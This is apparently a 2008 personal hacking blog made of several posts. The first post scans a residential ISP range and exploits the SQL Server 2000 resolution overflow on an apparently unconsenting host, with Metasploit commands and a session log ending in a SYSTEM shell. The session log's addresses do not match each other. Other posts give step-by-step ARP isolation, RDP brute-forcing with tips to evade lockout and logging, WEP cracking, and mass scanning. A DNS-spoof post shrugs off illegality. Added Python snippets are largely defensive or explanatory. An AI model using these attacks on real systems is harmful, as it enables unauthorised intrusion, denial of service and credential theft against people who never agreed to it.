Monday, July 28, 2008

MSSQL Exploit

The following is an exploit walkthrough against Microsoft SQL Server 2000 (and MSDE 2000) through its resolution service.

Requirements
Metasploit framework
NMap

Microsoft SQL Server listens on two ports: TCP 1433, which carries the database protocol itself, and UDP 1434, the SQL Server Resolution Service that tells clients which port each named instance is listening on. (TCP is the Transmission Control Protocol; UDP is the User Datagram Protocol.) For NMap we will be using a SYN scan, which is pretty much like playing ding dong ditch. A regular TCP connection requires a three-way handshake: SYN, SYN/ACK, ACK. A SYN scan sends the SYN, waits for the reply (a SYN/ACK means the port is open, a RST means it is closed) and then leaves, answering with a RST instead of the final ACK so the connection is never completed. That only applies to the TCP side; UDP has no handshake, so the UDP scan (-sU) sends a datagram to each port and treats an ICMP port-unreachable as closed, a reply from the service as open, and silence as open|filtered. In Metasploit we will be using the exploit MSSQL 2000/MSDE Resolution Overflow, which the module describes as follows: “This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).” This is the same bug the SQL Slammer worm spread through in January 2003; SQL Server 2000 SP3 (build 8.00.760) and later are not affected.

The first step is to find a vulnerable host; to do this we will be looking for a host that has UDP port 1434 open. When I scan hosts with NMap I always give it a range so I have a better chance of getting a hit. I also have the command output the results to a file so I have them on record and they are easier to search.

#nmap -sU -p1434 -P0 -sS 24.151.0.0/16 >>/home/user/1434.txt

-sU UDP scan
-p What port to scan, in this case 1434 (applies to both the UDP and the TCP scan)
-P0 Don't ping hosts first; treat every address as up (newer NMap spells this -Pn)
-sS SYN scan; this is for TCP but I'm in the habit of always using it (raw-packet scans need root, hence the # prompt)
IP The starting address of the range, 24.151.0.0
/ Subnet suffix, in this case /16 = 255.255.0.0
>> Append the output to the file that follows

The scan is going to take a while: a /16 is 65,536 addresses. When the scan is done, or after 30 minutes or so, feel free to start searching the output file for anything that says open.

Interesting ports on 24-151-73-076.dhcp.nwtn.ct.charter.com (24.151.73.76):
PORT STATE SERVICE
1434/udp open ms-sql-s

So now that we have found a potential target, we try to exploit it. I will be using the Metasploit 2 console for this attack; Metasploit 3, the GUI and the web interface will all work as well.

#msfconsole
[*] Starting the Metasploit Framework...



+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf > use mssql2000_resolution
msf mssql2000_resolution > set PAYLOAD win32_bind_meterpreter
PAYLOAD -> win32_bind_meterpreter
msf mssql2000_resolution(win32_bind_meterpreter) > show options

Exploit and Payload Options
===========================

Exploit:    Name      Default                                       Description
--------    ------    -------                                       ------------------
required    RHOST                                                   The target address
required    RPORT     1434                                          The target port

Payload:    Name      Default                                       Description
--------    --------  -------                                       ------------------
required    EXITFUNC  process                                       Exit technique: "process", "thread", "seh"
required    METDLL    /home/framework/data/meterpreter/metsrv.dll   The full path the meterpreter server dll
required    LPORT     4444                                          Listening port for bind shell

Target: MSQL 2000 / MSDE

msf mssql2000_resolution(win32_bind_meterpreter) >


msf mssql2000_resolution(win32_bind_meterpreter) > set RHOST 24.151.73.76
RHOST -> 24.151.73.76




msf mssql2000_resolution(win32_bind_meterpreter) > set LHOST 10.10.10.197
LHOST -> 10.10.10.197
msf mssql2000_resolution(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Trying target MSQL 2000 / MSDE with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Got connection from 10.10.10.197:2199 <-> 24.89.130.146:4444
[*] Sending Intermediate Stager (89 bytes)
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed

meterpreter> use -m Process
loadlib: Loading library from 'ext227496.dll' on the remote machine
meterpreter>
loadlib: success.
meterpreter> execute -f cmd -c
execute: Executing 'cmd'...
meterpreter>
execute: success, process id is 1576
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1...
meterpreter>
interact: Started interactive channel 1.

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>

When you get to the shell you can run whoami (on Windows 2000 it comes from the Resource Kit rather than the base install) and you will see that you are NT AUTHORITY\SYSTEM, the LocalSystem account the SQL Server service was running under here. That is more than Administrator rights: SYSTEM has full control of the machine, and anything you start from this shell inherits it. Now your imagination is the limit.
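To make the UDP/1434 side of this concrete, here is an added example (not code from the original post or from Metasploit) that speaks the resolution service protocol the post relies on: it builds the harmless one-byte enumeration probe, parses the server's reply into per-instance records, decides from the reported build whether an instance is pre-SP3 (the module's own vulnerability criterion; RTM is 8.00.194, SP3 is 8.00.760), and classifies inbound datagrams so a sensor can flag an oversized 0x04 instance lookup, which is what the overflow and the Slammer worm look like on the wire. The datagram layout and build numbers are Microsoft's; SAMPLE_RESPONSE is constructed, and the length threshold in classify_request is this example's own heuristic.

```python
"""SQL Server Resolution Service (SSRP, UDP 1434) helpers.

Added example, not code from the original post or from Metasploit. The
datagram layout and the SQL Server 2000 build numbers are Microsoft's; the
SAMPLE_RESPONSE bytes are constructed, and the length threshold used to
flag a suspicious 0x04 request is this example's own heuristic.
"""
import socket
import struct

CLNT_BCAST_EX = 0x02    # "list every instance" (broadcast form)
CLNT_UCAST_EX = 0x03    # "list every instance" (unicast form)
CLNT_UCAST_INST = 0x04  # "look up this instance name": the handler with the overflow
SVR_RESP = 0x05         # server reply: type, uint16 LE length, 'key;value;...;;' text

SP3_BUILD = (8, 0, 760)  # SQL Server 2000 SP3; the module says pre-SP3 is vulnerable
MAX_INSTANCE_NAME = 16   # SQL Server instance names are at most 16 characters


def build_enumeration_request():
    """The harmless probe: one byte asking the host to list its instances."""
    return bytes([CLNT_UCAST_EX])


def parse_response(data):
    """Turn an SVR_RESP datagram into one dict per instance."""
    if len(data) < 3 or data[0] != SVR_RESP:
        raise ValueError("not an SSRP server response")
    (length,) = struct.unpack_from("<H", data, 1)
    body = data[3:3 + length].decode("ascii", errors="replace").rstrip("\x00")
    instances = []
    for chunk in body.split(";;"):       # each instance ends with ';;'
        fields = chunk.split(";")
        if len(fields) < 2:
            continue
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def parse_version(text):
    """'8.00.194' -> (8, 0, 194) so versions compare numerically."""
    return tuple(int(part) for part in text.split("."))


def is_pre_sp3(instance):
    """True for a SQL Server 2000 / MSDE 2000 build older than SP3."""
    version = parse_version(instance.get("Version", "0"))
    return version[0] == 8 and version < SP3_BUILD


def classify_request(data):
    """Label an inbound UDP/1434 datagram for detection purposes."""
    if not data:
        return "empty"
    kind = data[0]
    if kind in (CLNT_BCAST_EX, CLNT_UCAST_EX) and len(data) == 1:
        return "enumeration"
    if kind == CLNT_UCAST_INST:
        # A legitimate lookup carries a short instance name; the overflow
        # (and the Slammer worm's 376-byte packet) carries far more.
        if len(data) - 1 > MAX_INSTANCE_NAME * 2:
            return "suspicious"
        return "instance_lookup"
    return "other"


def probe(host, timeout=2.0):
    """Send the enumeration request to a live host and parse what comes back."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_enumeration_request(), (host, 1434))
        data, _ = sock.recvfrom(4096)
    return parse_response(data)


# Constructed reply: one RTM instance (vulnerable) and one SP3 instance (patched).
_BODY = (b"ServerName;SQLBOX;InstanceName;MSSQLSERVER;IsClustered;No;"
         b"Version;8.00.194;tcp;1433;;"
         b"ServerName;SQLBOX;InstanceName;PATCHED;IsClustered;No;"
         b"Version;8.00.760;tcp;1435;np;\\\\SQLBOX\\pipe\\MSSQL$PATCHED\\sql\\query;;")
SAMPLE_RESPONSE = bytes([SVR_RESP]) + struct.pack("<H", len(_BODY)) + _BODY


if __name__ == "__main__":
    for inst in parse_response(SAMPLE_RESPONSE):
        state = "pre-SP3 (vulnerable)" if is_pre_sp3(inst) else "SP3 or later"
        print(inst["InstanceName"], inst["Version"], state)
    print(classify_request(b"\x04" + b"\x01" * 375))
```

probe() is the only part that touches the network; everything else runs against the constructed reply, so the version check can be tried before anything is pointed at a real host.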

By,
Syrus

Thursday, July 24, 2008

Isolate IP

Ettercap has a plugin to isolate a host on the network. In effect it is a denial of service against that one host, which can be useful for network administrators. For example, unlike Cisco, where you can shut down an interface on a switch, SonicWall won't let you do such a thing, which can make administering a network a good amount harder, especially when you have end users running iTunes, torrents, etc.
To start this attack you will need the IP of the host you are isolating; in this case it will be 192.168.2.3. How the attack works: the plugin answers every ARP request the victim sends with the victim's own MAC address, so in its ARP cache the gateway and every other host resolve to itself, and its frames never reach anyone. Here is the network setup of the Windows box, from ipconfig /all.

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : NVIDIA nForce Networking Controller
Physical Address. . . . . . . . . : 00-11-D8-70-48-4F
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.2.3
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.2.1
DHCP Server . . . . . . . . . . . : 192.168.2.1
DNS Servers . . . . . . . . . . . : 192.168.2.1
Primary WINS Server . . . . . . . : 192.168.2.1
Lease Obtained. . . . . . . . . . : Thursday, July 24, 2008 11:42:50 AM
Lease Expires . . . . . . . . . . : Thursday, July 24, 2008 11:52:50 AM

Here is the arp -a output:
Interface: 192.168.2.3--- 0x2
Internet Address Physical Address Type
192.168.2.1 00-06-b1-36-1f-24 dynamic

To start the attack we use the isolate plugin and specify the IP we are attacking. Here is what the command looks like.

#ettercap -i sk0 -P isolate /192.168.2.3/ //

The command takes a few minutes to take effect (about 5 in this case), because the plugin only answers the victim's own ARP requests: nothing changes until the victim's cached entry for the gateway expires and it asks again. Once it does, arp -a should look like this.

Interface: 192.168.2.3--- 0x2
Internet Address Physical Address Type
192.168.2.1 00-11-D8-70-48-4F dynamic

As you can see, that isn't the MAC address 192.168.2.1 had when we first ran arp -a; the gateway now resolves to the victim's own MAC. If the victim tries to reach a web site, ettercap will output something along the lines of this.

TCP 192.168.2.3:80 --> 127.0.0.1:80 | AP
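The poisoned ARP entry above is the whole attack, so here is an added example (not ettercap's code) that builds the reply isolate sends, parses it back out of the raw Ethernet frame, and runs the arpwatch-style check a defender would use to catch it: compare each ARP reply against a known-good ip-to-mac table and flag a gateway that suddenly "moves" to the target's own MAC. The MACs and IPs are the ones in the ipconfig and arp -a output above; KNOWN is a constructed snapshot of the healthy table, and the finding strings are this example's own. The same check catches the ordinary -M arp poisoning ettercap uses for man-in-the-middle attacks, where the gateway moves to the attacker's MAC instead.

```python
"""ARP frames of the kind ettercap's isolate plugin sends, plus a check
that spots them. Added example, not ettercap's code. MACs and IPs are the
ones from the post above; KNOWN is a constructed snapshot of the healthy
ARP table, and the findings text is this example's own."""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.replace("-", ":").split(":"))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP packet (RFC 826 field order)."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)  # Ethernet, IPv4, 6-byte hw, 4-byte proto
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of a frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op,
            "sender_mac": mac_str(frame[22:28]), "sender_ip": ip_str(frame[28:32]),
            "target_mac": mac_str(frame[32:38]), "target_ip": ip_str(frame[38:42])}


def isolate_reply(victim_mac, victim_ip, gateway_ip):
    """What isolate sends the victim: 'gateway_ip is at <the victim's own MAC>'."""
    return build_arp(ARP_REPLY, victim_mac, gateway_ip, victim_mac, victim_ip)


def check_reply(pkt, known):
    """Compare an ARP reply with a known-good ip->mac table (arpwatch style)."""
    if pkt is None or pkt["op"] != ARP_REPLY:
        return None
    claimed = pkt["sender_mac"]
    expected = known.get(pkt["sender_ip"])
    if expected is None:
        return f"new station {pkt['sender_ip']} at {claimed}"
    if expected.lower() == claimed:
        return None
    if claimed == known.get(pkt["target_ip"], "").lower():
        return (f"{pkt['sender_ip']} now claims {pkt['target_ip']}'s own MAC "
                f"{claimed}: isolate-style poisoning")
    return f"{pkt['sender_ip']} changed from {expected.lower()} to {claimed}: ARP spoofing"


# Constructed snapshot of the healthy network from the post's ipconfig/arp output.
KNOWN = {"192.168.2.1": "00:06:b1:36:1f:24",   # gateway
         "192.168.2.3": "00:11:d8:70:48:4f"}   # victim


if __name__ == "__main__":
    frame = isolate_reply("00-11-D8-70-48-4F", "192.168.2.3", "192.168.2.1")
    print(check_reply(parse_arp(frame), KNOWN))
```

Feeding real frames into parse_arp only needs a raw socket or a pcap reader on the segment being watched; the check itself is stateless apart from the baseline table.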

Tuesday, July 22, 2008

tsgrinder

TSGrinder is a Terminal Server (RDP) brute-force tool. It runs dictionary attacks and has a very useful "leet" function that tries character substitutions on each word. The leet file and dictionary it ships with are weak to start with, but that is easily remedied. If you run the command with no arguments you will get the following.
c:\tsgrinder>tsgrinder.exe
tsgrinder version 2.03

Usage:
tsgrinder.exe [options] server

Options:
-w dictionary file (default 'dict')
-l 'leet' translation file
-d domain name
-u username (default 'administrator')
-b banner flag
-n number of simultaneous threads
-D debug level (default 9, lower number is more output)

Example:
tsgrinder.exe -w words -l leet -d workgroup -u administrator -b -n 2 10.1.1.1

The example demonstrates very well how to use this program. For this example I will be attacking my own server.

C:\tsgrinder>tsgrinder.exe -w dict -u administrator 192.168.2.1
password aaa - failed
password abc - failed
password academia - failed
password academic - failed
password access - failed
password ada - failed
password admin - failed
password adrian - failed
password adrianna - failed
password aerobics - failed
password airplane - failed
password password - success!

Once tsgrinder finds the password, it will output success and log off of mstsc. Since the dict file is weak, I recommend searching for a larger word list; it will make life a lot easier. The leet file is also pretty weak by default. This is all it has:
l 1
e 3
t 7
s 5
Feel free to extend it by adding more substitutions, such as:
a @
o 0
etc. I also recommend targeting the built-in Administrator account, since by default it is exempt from account lockout no matter how many bad passwords you try (unless lockout has been enabled for it with passprop /adminlockout). Also, if you noticed, tsgrinder tries 5 passwords, disconnects, reconnects and tries 5 more; the idea is that a log entry won't appear until you get the password wrong on 6 consecutive attempts. Whether the target actually records anything depends on its audit policy: with failure auditing of logon events enabled, every bad password produces a failed-logon event in the Security log regardless of how the attempts are batched, while on a default Windows 2000 install, where auditing is off, nothing is written. Now for the 1337: you just add the -l switch to the command.

C:\tsgrinder>tsgrinder.exe -w dict -l leet -u administrator 192.168.2.3
password academia - failed
password acad3mia - failed
password academic - failed
password acad3mic - failed
password access - failed
password acces5 - failed
password acce5s - failed
password acce55 - failed
password acc3ss - failed
password acc3s5 - failed
password acc35s - failed
password acc355 - failed

That shows you roughly how it works. There is also the -n switch, which allows more than one session. With one session you are able to try 5 passwords in 10 seconds, but with -n 2 you can try 10 passwords in 11 seconds. I haven't tried more than 2 simultaneous connections since it slows your computer down.

C:\tsgrinder>tsgrinder.exe -w dict -u administrator -n 2 192.168.2.3
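The leet output above follows a fixed pattern: the plain word first, then every combination of substitutions, with the rightmost substitutable character changing fastest. Here is an added example (not tsgrinder's code) that reconstructs that expansion from a leet file in the two-column format shown above, counts how many guesses a word turns into, and groups the resulting guess stream into the five-per-connection batches tsgrinder uses. The default table is the one from the post; the expansion order was taken from the post's output for "access".

```python
"""tsgrinder's 'leet' expansion and its five-guesses-per-session batching,
reconstructed. Added example, not tsgrinder's code; the substitution table
is the default one shown in the post and the expansion order was taken
from the post's 'access' output."""
import itertools

DEFAULT_LEET = "l 1\ne 3\nt 7\ns 5\n"


def parse_leet_file(text):
    """'char replacement' per line -> {char: [replacements]}; listing a
    character twice (e.g. 'a @' and 'a 4') gives it two replacements."""
    table = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 2:
            table.setdefault(parts[0], []).append(parts[1])
    return table


def leet_variants(word, table):
    """Every substitution pattern, plain word first, rightmost substitutable
    character varying fastest (the order tsgrinder printed for 'access')."""
    choices = [[ch] + table.get(ch, []) for ch in word]
    return ["".join(combo) for combo in itertools.product(*choices)]


def variant_count(word, table):
    """Product of (1 + replacements) over the word: grows fast with -l."""
    count = 1
    for ch in word:
        count *= 1 + len(table.get(ch, []))
    return count


def candidates(words, table=None):
    """The guess stream: dictionary order, with -l style expansion if a table is given."""
    for word in words:
        if table is None:
            yield word
        else:
            yield from leet_variants(word, table)


def sessions(guesses, per_session=5):
    """Group guesses the way tsgrinder tries them: five per RDP connection."""
    batch = []
    for guess in guesses:
        batch.append(guess)
        if len(batch) == per_session:
            yield batch
            batch = []
    if batch:
        yield batch


if __name__ == "__main__":
    table = parse_leet_file(DEFAULT_LEET)
    for batch in sessions(candidates(["academia", "access"], table)):
        print(batch)
```

variant_count is the number to watch when you grow the leet file: each extra replacement multiplies the guesses for every word containing that character, which is why a big word list combined with a rich leet table takes far longer at 5 guesses per 10 seconds than the plain dictionary run.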

Monday, July 21, 2008

WEP Cracking

This is a guide I wrote a couple of years back, as you can tell, since the Auditor Security Collection has been BackTrack for over a year now. Most of the information still holds true.
Needed:
2 Prism 2/2.5/3 wireless cards
2 computers running Auditor

Key
# means channel number
PC means the AP’s client MAC address
AP means AP’s MAC address

Let's begin

Computer 1

Start up kismet

Press s to sort the APs

Press Enter on the AP you're attacking and note the following info
-Channel
-SSID
-BSSID

Press x to exit

Press shift + c to list the clients and note the following information
-PC

Exit kismet

Open a terminal and run the following commands
switch-to-hostap
cardctl eject
cardctl insert
iwconfig wlan0 channel #
iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master
void11_penetration -D -s PC -B AP wlan0

void11 deauthenticates the client from the AP; when it reconnects it sends traffic, including the ARP request we want to capture on the other machine.

Computer 2

Open a terminal and run the following commands
switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 #
cd /ramdisk
aireplay -i wlan0 -b AP -m 68 -n 68 -d ff:ff:ff:ff:ff:ff

-m 68 -n 68 selects 68-byte frames, the size of a WEP-encrypted ARP request, and -d keeps only frames sent to the broadcast address.

You need a packet that looks like such
FromDS – 0
ToDS -1
BSSID – AP
SourceMAC – PC
Destination MAC – ff:ff:ff:ff:ff:ff

Press y to replay this ARP packet

Computer1

Since you got the above packet you can close void11

Open a terminal and run
switch-to-wlanng
cardctl eject
cardctl insert
monitor.wlan wlan0 #
cd /ramdisk
airodump wlan0 cap1

Once you have about 100,000 IVs exit for 64-bit keys, 800,000 for 128-bit keys. (These key lengths include the 24-bit IV, so a "64-bit" key has a 40-bit secret and a "128-bit" key a 104-bit secret.)

Open a terminal
cd /ramdisk
aircrack -f 2 -m AP -n 64 -q 3 cap*.cap

-f is the fudge factor, -m filters on the AP's MAC, -n is the key length (use -n 128 for a 128-bit key) and -q keeps the output quiet.

In a while you should have your WEP key
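The procedure above never says why it needs hundreds of thousands of IVs or why it replays an ARP request in particular, so here is an added example (not part of the original guide and not aircrack's code) showing the WEP framing that makes both steps work: RC4 keyed with the 24-bit IV followed by the secret, a CRC-32 integrity check, and what an observer gets when two frames reuse an IV or when one frame's plaintext is known (an ARP request has a fixed header, which is why aireplay hunts for 68-byte broadcast frames). The key, IV and plaintexts are constructed. The statistical key recovery aircrack performs on the collected IVs is not implemented here.

```python
"""WEP encryption as RC4 over IV||key, to show what the IVs the guide
collects are for. Added example, not part of the original guide or of
aircrack; key, IV and plaintexts are constructed. It does not implement
the statistical key recovery aircrack performs."""
import struct
import zlib


def rc4(key, data):
    """Plain RC4: key scheduling, then the keystream XORed over data."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(payload):
    """WEP's integrity check: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def wep_encrypt(secret, iv, payload, key_id=0):
    """Frame body: IV(3) | key id byte | RC4_{IV||secret}(payload || ICV)."""
    if len(secret) not in (5, 13):
        raise ValueError("WEP secret is 40 bits (64-bit key) or 104 bits (128-bit key)")
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    return iv + bytes([key_id << 6]) + rc4(iv + secret, payload + icv(payload))


def wep_decrypt(secret, frame):
    """Recover the payload; the ICV check rejects a wrong key."""
    iv, body = frame[:3], frame[4:]
    plain = rc4(iv + secret, body)
    payload, tag = plain[:-4], plain[-4:]
    if icv(payload) != tag:
        raise ValueError("bad ICV: wrong key or corrupted frame")
    return payload


def keystream_reuse_leak(frame_a, frame_b):
    """Two frames with the same IV share a keystream: XOR of ciphertexts =
    XOR of plaintexts, with no key involved. None if the IVs differ."""
    if frame_a[:3] != frame_b[:3]:
        return None
    return bytes(a ^ b for a, b in zip(frame_a[4:], frame_b[4:]))


def recover_keystream(frame, known_plaintext):
    """Known plaintext (an ARP request has a fixed LLC/SNAP/ARP header)
    gives the keystream for that IV; it then decrypts any other frame
    that reuses the IV."""
    return bytes(c ^ p for c, p in zip(frame[4:], known_plaintext))


def decrypt_with_keystream(frame, keystream):
    return bytes(c ^ k for c, k in zip(frame[4:], keystream))


IV_SPACE = 1 << 24  # 16,777,216 possible IVs, so busy networks repeat them quickly


if __name__ == "__main__":
    secret, iv = b"\x01\x02\x03\x04\x05", b"\x10\x20\x30"
    f1 = wep_encrypt(secret, iv, b"hello wep world!")
    f2 = wep_encrypt(secret, iv, b"second frame ok!")
    print(decrypt_with_keystream(f2, recover_keystream(f1, b"hello wep world!")))
```

Each replayed ARP request makes the AP (or client) answer with a fresh frame under a new IV, which is how the replay step turns a quiet network into the IV stream airodump collects; with only 2^24 IVs and a keystream that depends on nothing else, every captured IV is one more sample for the key-recovery statistics.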

Thursday, July 17, 2008

NMAP

Well, hopefully you read my previous post on nmap. My friend came over and was looking at nmap logs. He asked me why I always print them to a file instead of browsing them in a terminal. It's easier to search a file, for say the word "open". There is a problem I noticed when I print out the results to a file: it doesn't always print out the OS option even if I got it when doing it in the terminal. Well, anyway, to print the output to a file you just add the following to the end of the command.

>>file location

This works on both Unix and Windows boxes. The following command is for a Windows machine and the one after it is for a Unix box.

C:\Program Files\Nmap> nmap -p80 -P0 -sS 69.182.0.0/16 >>c:\folder\nmap.txt
#nmap -p80 -P0 -sS 69.182.0.0/16 >>/home/user/nmap.txt

Just a refresher of what everything means
-p80 port 80
-P0 run the scan even if the ping doesn't succeed (treat all hosts as up; -Pn in newer nmap)
-sS SYN scan
IP The IP address of whom you are scanning, or the starting point of the range
/16 Subnet mask 255.255.0.0 (65,536 addresses)
>> Append standard output to the file that follows
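Searching a redirected log for "open" has one trap worth knowing: a UDP port that never answers is reported as open|filtered, which a plain search for "open" matches, so a /16 UDP scan like the 1434 one earlier can look full of hits that are really silence. nmap's own -oG (greppable) and -oN (normal) options write the report to a file directly in a stable, one-line-per-host format. Here is an added example (not from either nmap post) that parses -oG output and separates confirmed open ports from the uncertain ones. SAMPLE is constructed in -oG format: the first host is the one the 1434 scan found above, the other two are made up, and the OS column is what -oG emits when -O was used.

```python
"""Pull confirmed open ports out of nmap's greppable (-oG) output. Added
example, not from either nmap post. SAMPLE is constructed in -oG format;
the first host is the one the 1434 scan found, the others are made up."""
import re

SAMPLE = (
    "# Nmap scan initiated as: nmap -sU -sS -p1434 -P0 -oG 1434.gnmap 24.151.0.0/16\n"
    "Host: 24.151.73.76 (24-151-73-076.dhcp.nwtn.ct.charter.com)\t"
    "Ports: 1434/open/udp//ms-sql-m///, 1434/filtered/tcp//ms-sql-m///\t"
    "OS: Microsoft Windows 2000\n"
    "Host: 24.151.73.77 ()\t"
    "Ports: 1434/open|filtered/udp//ms-sql-m///, 1434/closed/tcp//ms-sql-m///\n"
    "Host: 24.151.73.78 ()\tStatus: Down\n"
    "# Nmap done -- 65536 IP addresses scanned\n"
)

HOST_RE = re.compile(r"^(\S+)\s*\(([^)]*)\)")


def parse_greppable(text):
    """One dict per 'Host:' line: ip, name, os and a list of port dicts."""
    hosts = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        fields = {}
        for column in line.split("\t"):      # columns are 'Key: value', tab separated
            key, sep, value = column.partition(": ")
            if sep:
                fields[key] = value
        match = HOST_RE.match(fields.get("Host", ""))
        if not match:
            continue
        host = {"ip": match.group(1), "name": match.group(2),
                "os": fields.get("OS"), "ports": []}
        for entry in filter(None, fields.get("Ports", "").split(",")):
            # port/state/proto/owner/service/rpcinfo/version/
            parts = entry.strip().split("/")
            if len(parts) < 5:
                continue
            host["ports"].append({"port": int(parts[0]), "state": parts[1],
                                  "proto": parts[2], "service": parts[4]})
        hosts.append(host)
    return hosts


def open_ports(hosts, proto=None, include_unsure=False):
    """(ip, name, port, proto) for ports nmap reported 'open'.

    UDP ports that never answer come back 'open|filtered'; a plain search
    for 'open' matches those too, so they are excluded unless asked for.
    """
    wanted = {"open"}
    if include_unsure:
        wanted.add("open|filtered")
    hits = []
    for host in hosts:
        for port in host["ports"]:
            if port["state"] in wanted and (proto is None or port["proto"] == proto):
                hits.append((host["ip"], host["name"], port["port"], port["proto"]))
    return hits


if __name__ == "__main__":
    for ip, name, port, proto in open_ports(parse_greppable(SAMPLE)):
        print(f"{ip:<16} {name:<45} {port}/{proto}")
```

Point parse_greppable at the contents of a real .gnmap file and open_ports() gives the confirmed hits; pass include_unsure=True to see the open|filtered entries that a grep for "open" would have counted.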

Monday, July 14, 2008

Internal IP's on the internet

So when I was routerless for about a month or so, whenever I booted up my computer I noticed it was requesting a DHCP address and talking to a 10.x.x.x address. So I decided to delve a little deeper to see what was going on. I fired up ettercap to collect DHCP requests and this is what I got.
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.93.130.73] OFFER : 10.12.4.155 255.255.0.0 GW 10.12.0.1 DNS 24.151.8.219
DHCP: [10.12.0.1] ACK : 10.12.4.155 255.255.0.0 GW 10.12.0.1 DNS 24.151.8.219
DHCP: [10.93.130.73] OFFER : 10.12.42.34 255.255.0.0 GW 10.12.0.1
DHCP: [10.12.0.1] ACK : 10.12.42.34 255.255.0.0 GW 10.12.0.1
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.42.0.1] ACK : 24.181.183.57 255.255.254.0 GW 24.181.182.1 DNS 24.151.8.210
DHCP: [10.93.130.73] OFFER : 10.12.4.83 255.255.0.0 GW 10.12.0.1 DNS 24.151.8.219
DHCP: [10.12.0.1] ACK : 10.12.4.83 255.255.0.0 GW 10.12.0.1 DNS 24.151.8.219


Interesting, huh? Well, it gets even better. My IP wasn't even in the 24.*.*.* range.

sk0: flags=8843 metric 0 mtu 1500
options=b
ether 00:17:31:c1:d8:da
inet 96.x.x.x netmask 0xffffff00 broadcast 255.255.255.255
media: Ethernet autoselect (100baseTX )
status: active
So I searched all the IPs on ARIN and they are all owned by Charter, Newtown. So am I getting local IPs because cable broadband is just like a giant LAN? I remember hearing that somewhere but never delved too far into it.

Wednesday, July 9, 2008

DNS Spoof

This will only work if the computer running ettercap is set as the DMZ host or has a direct WAN connection. This is ILLEGAL! I can't stress that enough, but like the saying goes, it's only illegal if you get caught. It will only affect people on the same subnet as you, because ARP poisoning only reaches hosts in your own broadcast domain. To show you how many people will be affected by this attack, grab your IP address and subnet mask and convert them to binary. I'm going to use a Comcast one for the example.
71.235.115.114
255.255.248.0
01000111.11101011.01110011.01110010
11111111.11111111.11111000.00000000
I'm not going to walk you through the Boolean math; since you are trying to learn how to hack, you should have a basic understanding of subnetting. So this is what will be affected:
01000111.11101011.01110000.00000000-01000111.11101011.01110111.11111111
71.235.112.0-71.235.119.255
So that is a /21: 2,048 addresses, or 2,046 usable hosts once the network and broadcast addresses are taken out, that will be affected as long as you are running the attack.
Now on to the attack itself.
